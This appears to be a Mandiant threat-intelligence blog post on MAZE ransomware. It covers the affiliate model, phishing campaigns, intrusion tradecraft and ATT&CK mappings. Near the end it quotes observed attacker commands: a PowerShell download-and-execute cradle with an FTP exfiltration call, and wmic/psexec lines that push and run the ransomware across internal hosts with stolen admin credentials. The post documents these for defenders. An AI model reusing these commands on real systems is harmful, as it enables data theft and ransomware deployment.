Automatically investigate security alerts to reduce false positives.
Validate that security controls are working as expected.
Take decisive action with industry leading threat intelligence.
Fully map your entire environment to mitigate risks.
Defend your enterprise with managed detection and response.
Battle-test how well your security program performs.
Establish and properly orchestrate cyber defenses.
Train your security team to effectively protect your enterprise.
See case studies and customer testimonials.
Read expert perspectives and industry news.
Expand your cyber security knowledge base.
Listen to our State of the Hack, Eye on Security and Cyber Security Effectiveness podcasts.
Threat Intelligence from front line experts.
Explore the latest views on key threats, trends and predictions.
Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies.
FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment.
Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.
Malicious actors have been actively deploying MAZE ransomware since at least May 2019.
The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise.
Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements.
Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.
The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations.
This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.
Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.
We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019.
These organizations have been primarily based in North America, although victims spanned nearly every geographical region.
Nearly every industry sector including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government has been impacted demonstrating that indiscriminate nature of these operations (Figure 1).
Figure 1: Geographical and industry distribution of alleged MAZE victims
Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams.
Additional information on these actors is available to Mandiant Intelligence subscribers.
A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions.
This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group.
Under this business model, ransomware developers will partner with other actors (i.e.
affiliates) who are responsible for distributing the malware.
In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission.
Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment.
This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of which who appear to work on a percentage-basis.
Notably, in some cases, actors may be hired on a salary basis (vs commission) to perform specific tasks such as determining the victim organization and its annual revenues.
This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.
Figure 2: MAZE ransomware panel
MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019.
For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea.
These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.
On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3).
Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently.
These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.
On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United states.
These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.
On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5).
These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks.
Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.
Figure 4: AT&T email lure
Figure 5: Canada Post email lure
Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise.
This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees.
Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.
Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams.
Even within these teams, the cyber criminals appear to be task-oriented meaning that one operator is not responsible for the full lifecycle.
The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these operations.
Notably, the time between initial compromise to encryption has also been widely varied, from weeks to many months.
There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents.
This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access.
The following are a sample of observations from several Mandiant incident response engagements:
Establish Foothold & Maintain Presence
The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware.
Despite these commonplace behaviors, we have observed an actor create their own domain account to enable latter-stage operations.
Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.
Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents.
The varied tools and approaches across these incidents maybe best highlights the divergent ways in which the responsible actors interact with victim networks.
Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials.
Despite this uniformity, some alternative tools and approaches were also observed.
There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents.
While malicious actors could monetize stolen data in various way (e.g.
sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.
In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network.
Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.
Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector.
For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.
Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation.
Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.
MVX (covers multiple FireEye technologies)
Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware.
Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters.
It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).
T1027: Obfuscated Files or Information
T1083: File and Directory Discovery
T1016: System Network Configuration Discovery
T1005: Data from Local System
T1071: Standard Application Layer Protocol
T1048: Exfiltration Over Alternative Protocol
T1486: Data Encrypted for Impact
T1140: Deobfuscate/Decode Files or Information
T1083: File and Directory Discovery
T1005: Data from Local System
T1039: Data from Network Shared Drive
T1071: Standard Application Layer Protocol
T1048: Exfiltration Over Alternative Protocol
T1486: Data Encrypted for Impact
T1027: Obfuscated Files or Information
T1083: File and Directory Discovery
T1039: Data from Network Shared Drive
T1071: Standard Application Layer Protocol
T1486: Data Encrypted for Impact
PowerShell reconnaissance script used to enumerate directories
Decoded FTP upload PowerShell script
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"
Decoded FTP upload PowerShell script
Excerpt from windows.bat kill script
start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"
			start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"
start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"
start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe
start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe
start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat
start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat
Example commands from MAZE distribution scripts
@echo off
			del done.txt
			del offline.txt
			rem Loop thru list of computer names in file specified on command-line
			for /f %%i in (%1) do call :check_machine %%i
			goto end
			:check_machine
			rem Check to see if machine is up.
Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m.
ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees.
Register today to reserve your spot.
